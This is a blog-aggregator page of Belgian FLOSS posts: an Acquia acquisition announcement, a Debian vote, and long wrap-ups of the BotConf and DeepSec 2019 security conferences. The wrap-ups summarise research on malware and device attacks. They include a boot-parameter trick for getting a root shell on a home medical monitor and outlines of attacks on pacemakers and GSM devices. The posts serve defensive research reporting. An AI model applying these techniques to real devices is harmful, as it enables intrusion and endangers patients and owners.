Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

December 12, 2019

I published the following diary on isc.sans.edu: “Code & Data Reuse in the Malware Ecosystem“:

In the past, I already had the opportunity to give some “security awareness” sessions to developers. One topic that was always debated is the reuse of existing code. Indeed, for a developer, it’s tempting to not reinvent the wheel when somebody already wrote a piece of code that achieves the expected results. From a gain of time perspective, it’s a win for the developers who can focus on other code. Of course, this can have side effects and introduce bugs, backdoors, etc… but it’s not today’s topic. Malware developers are also developers and have the same behavior. Code reuse has been already discussed several times… [Read more]

[The post [SANS ISC] Code & Data Reuse in the Malware Ecosystem has been first published on /dev/random]

We’ve all been there, right? You debug something, you try telnet to see if a port is open, and now you’re stuck in a telnet session.

December 11, 2019

I'm excited to announce that Acquia has signed a definitive agreement to acquire AgilOne, a leading Customer Data Platform (CDP).

CDPs pull customer data from multiple sources, clean it up and combine it to create a single customer profile. That unified profile is then made available to marketing and business systems to improve the customer experience.

For the past 12 months, I've been watching the CDP space closely and have talked to a dozen CDP vendors. I believe that every organization will need a CDP (although most organizations don't realize it yet).

Why AgilOne?

According to independent research firm The CDP Institute, CDPs are a part of a rapidly growing software category that is expected to exceed $1 billion in revenue in 2019. While the CDP market is relatively new and small, a plethora of CDPs exist in the market today.

One of the reasons we really liked AgilOne is their machine learning capabilities — they will give our customers a competitive advantage. AgilOne supports machine learning models that intelligently segment customers and predict customer behaviors (e.g. when a customer is likely to purchase something). This allows for the creation and optimization of next-best action models to optimize offers and messages to customers on a 1:1 basis.

For example, lululemon, one of the most popular brands in workout apparel, collects data across a variety of online and offline customer experiences, including in-store events and website interactions, commerce transactions, email marketing, and more. AgilOne helped them integrate all those systems and create unified customer data profiles. This unlocked a lot of data that was previously siloed. Once lululemon better understood its customers' behaviors, they leveraged AgilOne's machine learning capabilities to increase attendance to local events by 25%, grow revenue from digital marketing campaigns by 10-15%, and increase site visits by 50%.

Another example is TUMI, a manufacturer of high-end suitcases. TUMI turned to AgilOne and AI to personalize outbound marketing (like emails, push notifications and one-to-one chat), smarten its digital advertising strategy, and improve the customer experience and service. The results? TUMI sent 40 million fewer emails in 2017 and made more money from them. Before AgilOne, TUMI's e-commerce revenue decreased. After they implemented AgilOne, it increased sixfold.

Fundamentally improving the customer experience

Having a great customer experience is more important than ever before — it's what sets competitors apart from one another. Taxis and Ubers both get people from point A to B, but Uber's customer experience is usually superior.

Building a customer experience online used to be pretty straightforward; all you needed was a simple website. Today, it's a lot more involved.

The real challenge for most organizations is not to redesign their website with the latest and greatest JavaScript framework. No, the real challenge is to drive relevant customer experiences across all the different channels — including web, mobile, social, email and voice — and to make those customer experiences highly relevant.

I've long maintained that the two fundamental building blocks to delivering great digital experiences are (1) content and (2) user data. This is consistent with the diagram I've been using in presentations and on my blog for many years where "user profile" and "content repository" represent two systems of record (though updated for the AgilOne acquisition).

A diagram that shows organizations need both good user data and good content to deliver relevant digital experiences.

To drive results, wrangling data is not optional

To dramatically improve customer experiences, organizations need to understand their customers: what they are interested in, what they purchased, when they last interacted with the support organization, how they prefer to consume information, etc.

But as an organization's technology stack grows, user data becomes siloed within different platforms:

A diagram that illustrates how user data is siloed within different platforms, including web, email marketing, commerce, and CRM

When an organization doesn't have a 360º view of its customers, it can't deliver a great experience to its customers. We have all interacted with a help desk person that didn't know what you recently purchased, is asking you questions you've answered multiple times before, or isn't aware that you already got some help troubleshooting through social media.

Hence, the need for integrating all your backend systems and creating a unified customer profile. AgilOne addresses this challenge, and has helped many of the world's largest brands understand and engage better with their customers.

A diagram that shows how user data is unified with AgilOne across web, email marketing, commerce, social media, and CRM.

Acquia's strategy and vision

It's easy to see how AgilOne is an important part of Acquia's vision to deliver the industry's only open digital experience platform. Together, with Drupal, Lift and Mautic, AgilOne will allow us to redefine the customer experience stack. Everything is based on Open Source and open APIs, and designed from the ground up to make it easier for marketers to create relevant, personal campaigns across a variety of channels.

A diagram shows how Acquia solutions unify experience creation, content and user data across different platforms.

Welcome to the team, AgilOne! You are a big part of Acquia's future.

Het land in crisis: alle hoofdredacteuren van het land schrijven opiniestukken!

Honderden vrouwen naar de rechtbank. Christine Mussche fantaseert zich al rijk: driehonderd keer een factuur van een paar duizend Euro! Dat is een villa. Dat zal vast een vruchtgebruik worden. Want haar kuuroord voor misnoegde vrouwen kan nadien nog omgetoverd worden in een sauna- en massagesalon of een heus bedevaartsoord voor het Belgisch feminisme.

Met wat mevrouw de advocaat er waarschijnlijk aan gaat verdienen hadden we er ook een begrotingstekort van een gemiddeld groot dorp mee kunnen oplossen, er een school of een typisch gemeentelijk zwembad mee kunnen bouwen.

Meanwhile: we hebben ook al maanden geen regering. Nobody cares.

December 10, 2019

Just sent in my vote. After carefully considering what I consider to be important, and reading all the options, I ended up with 84312756.

There are two options that rule out any compromise position; choice 1, "Focus on systemd", essentially says that anything not systemd is unimportant and we should just drop it. At the same time, choice 6, "support for multiple init systems is required", essentially says that you have to keep supporting other systems no matter what the rest of the world is doing lalala I'm not listening mom he's stealing my candy again.

Debian has always been a very diverse community; as a result, historically, we've provided a wide range of valid choices to our users. The result of that is that some of our derivatives have chosen Debian to base their very non-standard distribution on. It is therefore, to me, no surprise that Devuan, the very strongly no-systemd distribution, was based on Debian and not Fedora or openSUSE.

Personally I consider this variety in our users to be a good thing, and something to treasure; so any option that essentially throws that away, like choice 1, is not something I could live with. At the same time, the world has evolved, and most of our users do use systemd these days, which does provide a number of features over and above the older sysvinit system. Ignoring that fact, like option 6 does, is unreasonable in today's world.

So neither of those two options are acceptable to me.

That just leaves the other available options. All of those accept the fact that systemd has become the primary option, but differ in the amount of priority given to alternate options. The one outlier is option 5; it tries to give general guidance on portability issues, rather than commenting on the systemd situation specifically. While I can understand that desire, I don't agree with it, so it definitely doesn't get first position for me. At the same time, I don't think it's a terrible option, in that it still provides an opinion that I agree with. All in all, it barely made the cutoff above further discussion -- but really only barely so.

How did you vote?

December 06, 2019

It’s a classic issue for BotConf attendees, the last day is always a little bit stronger due to the social event organized every Thursday night. This year, we are in the French area where good wines are produced and the event took place at the “Cité du Vin”. The night was short but I was present at the first talk! Ready as usual!

The first talk was “End-to-end Botnet Monitoring with Automated Config Extraction and Emulated Network Participation” by Kevin O’Reilly and Keith Jarvis. Sometimes, you hesitate to attend the first conference of the day due to a lack of motivate and you have to force yourself.

Today, it really deserved to wake up on time to attend this wonderful talk. It started with a comparison of two distinct approaches to analyze malware samples: emulator vs. sandbox. For a sandbox, you provide a sample and results can be used as input for an emulator: C2, IPs, encryption keys, etc… (and vice-versa). The next part of the talk was dedicated to CAPE (“Config And Payload Extraction”) which is a fork of Cuckoo but with many decoding features that help to unpack and analyze via the browser. It has an API monitor, a debugger, a dumper, import reconstructor, etc. Many demos were performed. I’ll definitively install it to replace my old Cuckoo instance! The project is here.

The next talk was presented by Suguru Ishimaru, Manabu Niseki and Hiroaki Ogawa: “Roaming Mantis: A melting pot of Android bots“. This campaign started in Japan in 2018 and compromised residentials routers. Classic attacks: DNS settings were changed to redirect victims to rogue websites that… delivered malware samples! The talk covered malware samples that were used in the campaign:

  • MoqHao
  • FakeSpy
  • FakeCop
  • FunkyBot

For each of them, the malware was analyzed using the same way: how was it delivered, compromization, connections with the C2. The relation between them? They used the same technique to steal money. The money laundering process was also reviewed.

After a welcome coffee break,”The Cereals Botnet” was presented by Robert Neumann and Gergely Eberhardt. This time, no Android, no Windows but… NASes! (storage devices). This makes it a pretty unique botnet of approximatively 10K bots. The target was mainly D-Link NAS devices (consumer models).


They started to explain how the NAS was compromized using a vulnerability in a CGI script. To better understand how it worked, they simply connected a NAS on the wild Internet (note: don’t try this at home!) and were able to observe the behavior of the attacker (unusual HTTP request, outgoing traffic and suspicious processes. The exploit was via the SMS notification system in system_mgr.cgi. Once compromized, there was also a backdoor installed, many software components (a VPN client) and persistence was implemented too. I like the way the bot communicated with the C2: Via a feed RSS! Easy! Finally they explained that the vulnerability was patched by the vendor (years later!) but many devices remain unpatched…

The next talk was the result of a student’s research who tried to develop a tool to improve the generation of YARA rules. “YARA-Signator: Automated Generation of Code-based YARA Rules” presented by Felix Bilstein and Daniel Plohmann.

No need to present YARA. A fact is that most public rules (73%) are based on text strings but code-based rules are nice: they are robust, harder to circumvent by attackers and easier to automate but… not manually! A tool can be used for this purpose: YARA-Signator. The approach was to create signatures based on families from Malpedia. First, they explained how the tool works then the results. Interesting if you’re a big fan of YARA. The code is here.

After the lunch, the scheduled talk was “Using a Cryptographic Weakness for Malware Traffic Clustering and IDS Rule Generation” by Matthijs Bomhoff and Saskia Hoogma. This is kind of talk that I’m fear of after a nice lunch… The idea of the talk was to explain that bad encryption implementations by attackers can be used to track them.

There was no coffee break foreseen in this afternoon, so we continued with three talks in a row. “Zen: A Complex Campaign of Harmful Android Apps” by Lukasz Siewierski. A common question related to malware samples is: Are all apps are coming from the same author (or group?). Lukasz explained different techniques called “Zen” that perform malicious activities:

  • Repacking with a custom ad SDK
  • Click fraud
  • Rooting the device
  • Fake Google account creation
  • Code injection
  • Persistence

It was a review of another Android malware…

Martijn Grooten continues with “Malspam is Different Spam“. Martijn explained that, if spam is not a new topic, it remains a common infection vector. Why some emails are more likely to pass through our filters? A few words about spam-filtering, we rely on:

  • Block lists (IP, domains)
  • Sender verify (SPF, DKIM, DMARC, etc)
  • Content filtering (viagra, casino, …)
  • Link & attachments scanning

Some emails go to the sam traps and results are sent to the spam filter (which can also update itself). Spam scales badly. Then, Martijn showed some better examples that have chances to not be blocked.

Finally, the conference ended with “Demystifying Banking Trojans from Latin America” by Juraj Hornák, Jakub Soucek and Martin Jirkal. They presented the LATAM banking landscape (targetting Spanish & Portuguese speaking people) with malware. They explained the techniques used by the different malware families with the final goal to see the relations between them:

I like the “easter egg and human error” part where they explained some mistakes make by the attackers like… keeping a command in the code to spawn a calc.exe 😉

This edition could be called the “Android Malware Edition” seeing the number of presentations related to Android! (Like we had the “DGA Edition” a few years ago). This wrap-up closes these three days of BotConf 2019! Here are some stats provided by the organization:

  • CFP: 73 submissions
  • 3 workshops
  • 1 keynote
  • 28 presentations
  • 50 speakers
  • 1730 minutes of shared knowledge.

As usual, they also disclosed the location of the 2020 edition: we will be back to Nantes!

[The post BotConf 2019 Wrap-Up Day #3 has been first published on /dev/random]

December 05, 2019

The second day is over. Here is my daily wrap-up. Today was a national strike day in France and a lot of problems were expected with public transports. However, the organization provided buses to help attendees to travel between the city center and the venue. Great service as always 😉

After some coffee, the day started with another TLP:AMBER talk: “Preinstalled Gems on Cheap Mobile Phones” by Laura Guevara. So, to respect the TLP, nothing will be disclosed. Just keep in mind that if you use cheap Android smartphones, you get what you paid for…

Then, Brian Carter @
presented “Honor Among Thieves: How Stealer Malware Fuels an Underground Economy of Compromised Accounts”. It started with facts: Attackers make mistakes and leak online information like panels, configuration files or logs. You can find this information just via a browser, no need to hack them back.

Brian’s research goals were:

  • Understand the value of stolen data
  • Develop tools to collect, parse data
  • Collect info help identify malware families based on C2.
  • Develop detection rules to catch them

But, very important, we cannot commit crimes, not contribute to malicious activities or harm victims of malware. The golden rule here is: Be ethic! Research had also limitations, it’s impossible to collect everything and data may not be representative! What was the collection process? Terabytes of data, 1M stealer logs archives, many panels, builders, chat logs, forum posts, and market listings. Again, “stolen data” were collected from ethical sources like VT, shares, open directories. Brian also commented on the economics of stealers: The market is relatively small today and only a few criminals are successful in their business and stealer malware is low-volume. Here is an example of prices:

Then, when you collected so much data, what to do with a huge amount of data? Warn users if they are compromized, research adversaries, develop countermeasures, take down? This was an interesting talk.

The next speakers were Alexander Eremin and Alexey Shulmin who presented “Bot with Rootkit: Update and Mine!”. The research started with a “nice” sample that installed a Microsoft patch. Cool isn’t? Of course, the dropper was obfuscated and, once decoded, it used the classic VirtualAlloc() and GetModuleHandleA() to decrypt the data.

When they were able to extract strings, they continued to investigate and discovered interesting behaviors. The first one, the develop was nice enough to leave debugging comments via a write_to_log() function. The malware checked the OS version, the keyboard layout and created a MUTEX. Until now, nothing fancy, but the malware also installed a Microsoft patch, if not already installed: KB3033929. Why? The patch was required to allow check_crypt32_version() and support of SHA-2! Then, they explained how C2 communications are performed, based on HTTP and encrypted using RC4 and Base64 encoding. Then, a rootkit is installed to finally deploy a cryptominer. The rootkit is like Necurs and uses IOCTL-like registry keys. Example of commands supported:

  • 0x220004 – update rootkit
  • 0x220008 – update payload

After a caffeine refill, it was the turn of Tom Ueltschi who presented “DESKTOP-Group – Tracking a Persistent Threat Group (using Email Headers)”. Tom is a regular speaker at Botconf and always provides good content. This talk was tagged as TLP:GREEN. Good idea: he will try to make a “white” version of his slides as soon as possible. Remember that TLP:GREEN means “Limited disclosure, restricted to the community.”

Before the lunch break, two short presentations were scheduled. “The Bagsu Banker Case” by Benoît Ancel. Sorry, TLP:AMBER again.

The following talk was “Tracking Samples on a Budget” by <redacted>. It covered a personal project running for two years now which explained how to acquire a collection of malware samples… but being a student, with no budget! What are the (free) sources available? Open-source repositories, honeypots, pivots, feed, sandboxes, existing malware zoo like malshare or malc0de, etc. You can run also your own honeypot but it’s difficult to deploy a lot of them. The talk covered the components put in place to crawl the web, how to avoid some stupid limitations that you’ll face. Then comes the post-processing:

  • Upload new samples to VT
  • Enrichment (metadata, strings, …)
  • YARA rules!
  • Pivots

A good idea is also to search recursively for open directories that remain a goldmine. Here is the sample tracking lifecycle as implemented:

Acquire URL > Crawl > Download > Postprocessing > Store > Pivot

What about the results? Running for 2 years, 270K unique samples have been discovered, 25% of them not on VT, 600GB of data collected, 78% of the samples have 5+ score on VT. I had the opportunity to talk later with the speaker, it’s a great project… The code is running fine for 2 years and just does the job! Amazing project!

After the lunch, we had another restricted presentation (sorry, interesting content can’t be disclosed) – TLP:RED – by Thomas Dubier and Christophe Rieunier: “Botnet Tracking Story: from Spam Mail to Money Laundering”.

The next talk was “Finding Neutrino Botnet: from Web Scans to Botnet Architecture” by Kirill Shipulin and Alexey Goncharov. This research started with some interesting hits on a honeypot. They adapted the honeypot to respond positively and mimick a webshell. The scan was brute-forcing different webshells with a strange command: “die(md5(Ch3ck1ng))”. The malware they found had a classic behavior: check if already installed, exfiltrate system information and download/execute a payload (a cryptominer in this case). It implemented persistence via WMI, was fileless and also killed its competitors.

The next malware to be analyzed was BackSwap: “BackSwap Malware Campaign Evolution” by Carlos Rubio Ricote and David Pastor Sanz. This malware was found by eSet in May 2018 via trojanized apps (OllyDbg, Filezilla, ZoomIt, …). It used PIC – Position Independent Code and used shellcodes hidden in BMP images (see the DKMC tool). They explained how the malware worked, how the configuration was encrypted and, once decoded, what were the parameters like the statistics URL, the C2, User-Agent touse, and the injection delimiter. They decrypted the web inject and explained the technique used: via the navigation bar or the developer console. Then, they reviewed some discovered campaigns targetting banks in Poland, Spain.

After the afternoon coffee break, Mathieu Tartare came on stage to talk about “Winnti Arsenal: Brand-new Supplies“. WINNIT is a group that is often cited in the news and that compromized multiple organizations (telco, editors, healthcare, gambling, etc…) They are specialized in supply-chain attacks. They look to be active since 2013 (first public report) and in 2017… there was the famous CCleaner case! In 2018, the gaming industry was compromised. The 1st part of this talk covered this. The technique used by the malware was CRT patching. A function is called to unpack/execute the malicious code before returning to the original code. The payload was packed using a custom packer using RC4. The first stage is a downloader that gets its C2 config then gathers information about the victim’s computer. Amongst them, the C: drive name and volume ID are exfiltrated. The 2nd stage will decrypt a payload that was encrypted using… the volume ID! Finally, a cryptominer is installed. Mathieu also covered two backdoors: PortReuse that works like a good old port-knocking. It sniffs the network traffic and waits for a specific magic packet. The second one was ShadowPad.

The last talk for today was “DFIR & Crisis Management – Post-mortems & Lessons Learned in the Pain from the Field” by Vincent Nguyen. He was involved in many security incidents and explained some interesting facts about them. How they worked, what they found (or not 😉 and also, very important, lessons learned to improve the IR process.

The scheduled ended with a set of lightning talks. 19 talks of 3 mins with lot of interesting information, tools, stories, etc.

[The post BotConf 2019 Wrap-Up Day #2 has been first published on /dev/random]

If you’re setting up an Ubuntu 18.04 LTS server, you might want to give it a static IP address instead of one assigned by your router over DHCP.

December 04, 2019

Hello from Bordeaux, France where I’m attending the 7th edition (already!) of the BotConf security conference dedicated to fighting against botnets. After Nantes, Nancy, Paris, Lyon, Montpellier, Toulouse and now Bordeaux, their “tour de France” is almost completed. What will be the next location? I attended all the previous editions and many wrap-up’s are available on this blog. So, let’s start with the 2019 edition!

The conference was kicked off by Eric Freyssinet. This year, they received 73 submissions to the call for paper and 3 workshops (organized yesterday). The selection process was difficult and, according to Eric, we can expect interesting talks.

After the introduction, the first talk was ‘DeStroid – Fighting String Encryption in Android Malware” presented by Daniel Baier. He worked with Martin Lambertz on this topic.

Analyzing Android malware is not that hard because most developers use the standard API and applications can easily be decompiled. So, they have to use alternative techniques to obfuscate their interesting content. One of these is the use of encryption to hide strings. They are decrypted at run time. As you can imagine, doing this process manually is a pain. To test the DeStroid tool, they use the data set provided by Malpedia (also presented at BotConf preciously). They detected three techniques used to encrypt strings: by using a string repository, by passing strings to a decryption routine and via native libraries. Each technique was reviewed by Daniel. From a statistics point of view, 52% of the test Android samples use strings encryption and 56% of them use the “direct pass” method. The DeStroid tool was also compared to other solutions like JMD, Deobfuscator or Dex-Oracle. The tool is available here if you’re interested.

The next speaker was Marco Riccardi who presented “Golden Chickens: Uncovering A Malware-as-a-Service (MaaS) Provider and Two New Threat Actors Using It“. The talk was flagged as TLP:AMBER so I won’t disclose details about it. Just the same remark as usual which this kind of “sensitive” slides, can you trust a room full of 500 people? I like a slide (without any confidential information) that explained how to NOT do attribution:

IR > Found sample > Use technique “X” > Google for “technique X” > Found references to “China” > We are attacked by China > Case closed

The next talk focused on the gaming industry. I’m definitely not a game addict, so I’m always curious about what happens in this field. Basically, like any domain, if some profit can be made, bad guys are present! Making huge profits and targeting millions of players, it is normal to see attacks targetting big names like Counter-Strike. Ivan Korolev and Igor Zdobnov presented “Unrevealing the Architecture Behind the Counter-Strike 1.6 Botnet: Zero-Days and Trojans”. Do you remember that Counter-Strike was born in 1999? What’s the business behind CS 1.6? People want to play with more and more people. Servers need to be “promoted” to attract more gamers. “Boosting” is the technique to attract new players. If it can be performed with good & clean techniques, it can also be performed via malware. Ivan & Igor reviewed the different vulnerabilities found in the CS client and how it was (ab)used to build the botnet. Vulnerabilities were found in the parsing of SAV files (saved game files), BMP files. By exploiting vulnerabilities in the game, the client becomes part of a botnet. A rogue server can issue commands to a client like:

  • redirecting players to another server
  • tampering with configs
  • change behavior of the game

In the next part of the presentation, the trojan Belonard was described.
It is active since 05/2017 and constantly use new exploits & modules. Finally, they explained the take-down process.

After the lunch breach, the keynote was presented by Gilles Schwoerer and Michal Salat. Michal is working for an AV vendor and Gilles is working for the French law enforcement services. Their keynote was called “Putting an end to Retadup“.

What is Retadup? Michal started the technical part and explained the facts around this malware: It’s a worm that affected 1.3M+ computers via malicious LNK files. It’s not only a botnet but also a platform malware being used by others to distribute more malware through it. The original version was developed in AutoIt and has persistence, extraction of the victim’s details. It also implements a lot of anti-analysis techniques. Communications with the C2 is performed via a hardcoded list of domains and simple HTTP GET request, Base64 or hex-encoded. When the malware was discovered and analyzed, the C2 was found to be located in France. That was the second part of the keynote, presented by Gilles who explained the take-down process. Their plan was to present an empty update to the bots to make them inactive. This method did not prevent the infection but was less dangerous for the end-user. US Agencies were also active in the process to redirect the DNS to the rogue C2 server deployed by the French police. This keynote was a great example of collaboration between a vendor and LE services.

The next presentation was about an “Android Botnet Analysis – Shaoye Botnet” by Min-Chun Tsai, Jen-Ho Hsiao and Ding-You Hsiao. Like the previous talk, they did a review of another malware targeting Android devices. In Chinese, “Shaoye” means “Young master”. They analyzed two versions of the malware. The first one used DNS hijacking in residential routers to redirect victims to a rogue web site. The second version used compromised websites to spread malware. In the first, a fake Facebook app was installed and, in the second version, a fake Sagawa express application (Sagawa is a major transportation company in Japan). The malware samples were completely analyzed to explain how they work.

After a welcome coffee break, a very interesting talk was presented by Piotr Bialczak and Adrian Korczak: “Tracking Botnets with Long Term Sandboxing”. The idea behind the research was about improving the analysis of bot in a sandbox for a long period of time. We know that reverse engineering malware costs a lot of time and we use sandboxes as much as possible. The biggest constraint is that time allowed to execute, usually a few minutes. Malware developers know this and make their malware wait for a long period of time (> sandbox timeout) but increase the chances that the sandbox will stop by itself. They created a “LTS” – “Long Term Sandboxing” System that is optimized to allow a bot to run for a long time but without the technical constraints. Based on Qemu and a system of external snapshots combined with other tools like an ELK stack and Moloch, they are able to reduce the CPU resource, network bandwidth, etc. They analyzed 20 families of well-known botnets and showed interest information they learned at the network level, SMTP traffic or DGA. For example, it was possible to detect unusual protocols, traffic to non-standard ports).

The next talk was “Insights and Trends in the Data-Center Security Landscape” by Daniel Goldberg and Ophir Harpaz. There were some changes but I covered this talk last week at DeepSec (see my wrap-up here).

Then, Dimitris Theodorakis and Ryan Castellucci presented “The Hunt for 3ve“. Here again another family of malware that was dissected. This one targeted online ads. Yes, ads remain a business. In a few numbers: 1.8M+ infected computers, 3B+ ad requests/day, 10K+ spoofed domains, 60K+ accounts. Eve used three techniques that were reviewed by Dimitris and Ryan:

  • Boaxxe (residential proxy)
  • BGP hi-jacking
  • Kovter

Here again, after the technical details, they explained how the take-down process.

Finally, the first day ended with “Guildma: Timers Sent from Hell” presented by Adolf Streda, Luigino Camastra, and Jan Vojtešek. This time was analyzed malware was not only a RAT but also a spyware, password stealer and banking malware. The malware was spread through spam campaigns and was targeting mainly Brazil (at a first stage) then they targeted more countries.

That the end of day 1! Many botnets were covered, always with the same approach: hunting, find samples, analyze them, learn how they work and organize the take-down. See you tomorrow for the second wrap-up!

[The post BotConf 2019 Wrap-Up Day #1 has been first published on /dev/random]

December 01, 2019

Once upon a time I wrote a weekly newsletter on Linux, open source & web development.

November 30, 2019

November 29, 2019

Here we go for the second wrap-up! DeepSec is over, flying back tomorrow to Belgium. My first choice today was to attend: “How To Create a Botnet of GSM-devices” by Aleksandr Kolchanov. Don’t forget that GSM devices are not only “phones”. Aleksandr covered nice devices like alarm systems, electric sockets, smart-home controllers, industrial controllers, trackers and… smartwatches for kids!

They all have features like to send notifications via SMS, call pre-configured numbers but also be configured or polled via SMS. Example of attacks? Brute-force the PIN code, spoof calls, use “hidden” SMS commands. Ok, but what are the reasons to hack them? We have direct attacks (unlock the door, steal stuff) or spying: abuse the built-in microphone. Attacks on the property are also interesting: switch off electric devices (a water pump, a heating system). Also terrorism or political actions? Financial attacks (call or send SMS to premium numbers). Why a botnet? The get some money! Just use it to send huge amounts of SMS but also to DoS or for political/terrorism actions: Can you imagine thousands of alarms at the same time. Thanks to powerful marketing, people buy them so we have many devices in the wild:

  • Default settings
  • Stupid vulnerabilities
  • Not properly installed
  • Insecure by default
  • Cheap!
  • Absence of certification

After the introduction, Aleksandr explained how he performed attacks against different devices. It’s easy to hack them but the real challenge is to find targets. How? You can do a mass scanning and call all numbers but it will cost money and some operators will detect you (“Why are your calling xxx times per day?”) How to search without making a call? They are web services provided by some operators that help to get info about used numbers, they are open API, databases, leaked data, etc… Once you have enough valid devices, it’s time to build the botnet:

Scan > Identify > Attack > Change settings > Profit!

It was an interesting talk to kick off the day!

The next talk was about… pacemakers! Wait, everything has been said about those devices, right? A lot of material has already been published. The big story was in 2017 when a big flaw was discovered. The talk presented by Tobias Zillner was called “500.000 Recalled Pacemakers, 2 Billion $ Stock Value Loss – The Story Behind”.

When you need to assess such medical devices, where to get one? On a second-hand webshop! Just have a look at dotmed.com, their stock of medical devices is awesome! The eco-system tested was: pacemakers / programmers/home monitors and the “Merlin Net” alias “the cloud”. The first attack vector covered by Tobias was the new generation of devices that use wireless technologies (SDR), low power, short-range (2M) – 401-406Mhz). How to find technical specs? Just check the FCC-ID and search for it. Google remains always your best friend. The vulnerabilities found were an energy depletion attack (draining the battery) and a… crash of the pacemaker! The next target was the “Merlin@Home” device which is a home monitoring system. They are easy to find on eBay:

Just perform an attack like against any embedded Linux device: Connect a console, boot it, press a key to get the bootloader, change the boot command add “init=/bin/bash” like any Linux and boot in single-user mode! Once inside the box, it’s easy to find a lot of data left by developers (source code, SSH keys, encryption keys, source code, … The second part of the talk was dedicated to the full-disclosure process.

After a short coffee break, Fabio Nigi presented “IPFS As a Distributed Alternative to Logs Collection”. The idea behind this talk was to try to solve a classic headache for people who are involved in log management tasks. This can quickly become a nightmare due to the ever-changing topologies, the number of assets, amount of logs to collect and process. Storage is a pain to manage.

So, Fabio had the idea to use IPFS. IPFS means “Interplanetary file system” and is a P2P distributed file system that helps to store files in multiple locations. He introduced the tool, how it works (it look interesting, I wasn’t aware of it). Then he demonstrated how to interconnect it with a log collection solution using different tools like IPFS GW, React, Brig or Minerva. It’s an interesting approach, however, the project is still in the development phase (as stated on the website)…

There were many interesting talks today and, with a dual-track conference, it’s not always easy to choose the one that will be the most entertaining or interesting. My next choice was “Extracting a 19-Year-Old Code Execution from WinRAR” by Nadav Grossman.

WinRAR is a well-known tool to handle many archive formats. As the tool is very popular, it’s a great target for attackers because it is installed on many computers! After a very long part about fuzzing (the techniques, tools like WinAFL), Nadav explained how the vulnerability was found. It was located in a DLL used to process ACE files. Many details were disclosed and, if you are interested, there is a blog post available here. Note that since the vulnerability has been found and disclosed, the support of ACE archives has been removed from the last versions of WinRAR!

After the lunch break, I attended “Setting up an Opensource Threat Detection Program” by Lance Buttars (Ingo Money). This was an interesting talk about tools that you can deploy to protect your web services but also counterattack the bad guys. Many tools are used in Lance’s arsenal (ModSecurity, Reverse proxies, Fail2ban, etc…)

Lance also explained what honeypots are and the different types of data that you collect: domains, files, ports, SQL tables or DB. For each type, he gave some examples. Note that “active defense” is not allowed in many countries!

And the day continued with “Once Upon a Time in the West – A story on DNS Attacks” by Valentina Palacín and Ruth Esmeralda Barbacil. They reviewed well-known DNS attack techniques (DNS tunneling, hijacking, and poisoning) then they presented a timeline of major threats that affected DNS services and that abused the protocols like:

  • DNSChangerOperation Ghost Click
  • Syrian Electronic Army
  • Craiglist Hijacked
  • Oilrig: Suspected Iranian
  • Project Sauron (suspected USA)Darkhydrus (
  • Bernhard PoS
  • FIN7
  • DNSpionage
  • SeaTurtle

For each of them, they applied the Mitre ATT&CK framework. Nothing really new but a good recap which concludes that DNS is a key protocol and that it must be carefully controlled.

The two next talks focused more on penetration testing: “What’s Wrong with WebSocket APIs? Unveiling Vulnerabilities in WebSocket APIs
by Mikhail Egorov. He already published a lot of researches around WebSocket and started with a review of the protocol. Then he described different types of attacks. The second one was “Abusing Google Play Billing for Fun and Unlimited Credits!” by Guillaume Lopes. Guillaume explained how Google provides a payment framework for developers. Like the previous talk, it started with a review of the framework then how it was abused. He tested 50 apps, 29 were vulnerable to this attack. All developers were contacted and only 1 replied!

To close the day, Robert Sell presented “Techniques and Tools for Becoming an Intelligence Operator“. Open-source intelligence can be used in many fields: forensics, research, etc. Robert defines it as “Information that is hard to find but freely available”.

He explained how to prepare yourself to perform investigations, which tools to use, network connections, creation of profiles on social network and many more. The list of tools and URLs provided by Robert was amazing! Don’t forget that good OpSec is important. If you’re excited to search for information about your target, (s)he won’t probably be as excited as you! Also, keep in mind, that all techniques used can also be used against you!

That’s all Folks! DeepSec is over! Thanks again to the organizers for a great event!

[The post DeepSec 2019 Wrap-Up Day #2 has been first published on /dev/random]

November 28, 2019

Hello from Vienna where I’m at the DeepSec conference. Initially, I was scheduled to give my OSSEC training but it was canceled due to a lack of students. Anyway, the organizers proposed to me to join (huge thanks to them!). So, here is a wrap-up of the first day!

After the short opening ceremony by René Pfeiffer, the DeepSec organizer, the day started with a keynote. The slot was assigned to Raphaël Vinot and Quinn Norton: “Computer security is simple, the world is not”. 

I was curious based on the title but the idea was very interesting. Every day, as security practitioners, we deal with computers but we also have to deal with people that use a computer we are protecting! We have to take them into account. Based on different stories, Raphaël and Quinn gave their view of how to communicate with our users. First principle: Listen to them! Let them explain with their own words and shut up. Even if it’s technically incorrect, they could have interesting information for us. The second principle is the following: If you don’t listen to your users, you don’t know how to make your job! The next principle is to learn how they work because you must adapt to them. More close to your users you are, the more you can understand the risks they are facing. Also, don’t say “Do this, then this, …” but explain what is behind the action, why they have to do this. Don’t go too technical if people don’t ask details. Don’t scare your users! The classic example is the motivated user that has to finish his/her presentation for tomorrow morning. She/he must transfer files to home but how? If you block all the classic file transfer services, be sure that the worst one will be used. Instead, promote a tool that you trust and that is reliable! Very interesting keynote!

The first regular talk was presented by Abraham Aranguren: “Chinese Police & Cloudpets”. If you don’t Cloudpets, have a look at this video. What could go wrong? A lot! The security of this connected toy was so bad that major resellers like Walmart or Amazon decided to stop selling it. It’s a connected toy linked to mobile apps to exchange messages between parents and kids. Nice isn’t it? But they made a lot of mistakes regarding the security of the products. Abraham reviewed them:

  • Bad BlueTooth implementation, no control to pair or push/fetch data from the toy
  • Unprotected MongoDB indexed by Shodan, attacked multiple times by ransomware
  • Unencrypted firmware
  • Can be used as a spy device
  • The domain used to interact with the toy is now for sale (mycloudpets.com)
  • No HTTPS support
  • All recordings available in an S3 bucket (800K customers!)

The next part of the talk was about mobile apps used by Chinese police to track people, especially the Muslim population in Xinjiang: IJOP & BXAQ. IJOP means “Integrated Joint Operations Platform” and is an application used to collect private information about people and to perform big data analysis. The idea is to collect unusual behaviors and report them to central services for further investigations. The app was analyzed, reverse-engineered and what they found is scaring. Collected data are:

  • Recording of height & blood type
  • Anomaly detection
  • Political data
  • Religious data
  • Education level
  • Abnormal electricity use
  • Problematic tools -> to make explosives?
  • IF stopped using phone 

The BXAQ app is a trojan that is installed even on tourists phones to collect “interesting” data about them:

  • It scans the device on which it is installed
  • Collected info: calendar, contacts, calls, SMS, IMEI, IMSI, hardware details
  • Scan files on SD card (hash comparison)
  • A zip file created (without any password) and uploaded to police server

